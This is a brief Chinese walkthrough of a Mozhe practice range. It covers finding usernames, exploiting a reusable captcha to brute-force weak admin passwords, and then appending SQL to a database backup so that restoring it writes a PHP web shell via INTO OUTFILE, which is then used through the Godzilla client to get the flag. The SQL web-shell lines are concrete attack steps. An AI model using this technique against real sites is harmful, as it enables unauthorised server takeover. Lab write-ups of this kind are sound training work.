靶场为mozhe中的靶场
访问靶场地址
博客页面找到2个用户名
mozhe666
mozhe777

目录扫描工具扫到后台

后台是个带验证码的页面

这个靶场忘记密码这个功能是不存在,登陆输入框尝试sql注入失败
多次重发同一个包,发现一直提示密码错误,请重新输入。并没有提示验证码错误,说明存在验证码可以共用的漏洞。尝试弱口令爆破上面2个用户
先爆破出mozhe666,密码admin888

登录后台,写文章的功能试了试好像写不了马

爆破mozhe777,同样也是弱口令qwer1234

登录后台,这个功能是真的多应该是管理员

首先发现了一个上传功能,想传马尝试下没能绕过

又发现了一个数据库功能,想利用sql语句into outfile直接传马

先备份数据库导出sql文件,在最后加入
Drop TABLE IF EXISTS tpashell;
Create Table tpashell(`cmd` longtext NOT NULL);
Insert INTO tpashell VALUES('');
Select cmd from tpashell into outfile '/var/www/html/shell.php';
Drop TABLE IF EXISTS tpashell;

重新导入本地备份

更新缓存

哥斯拉连下,拿下flag
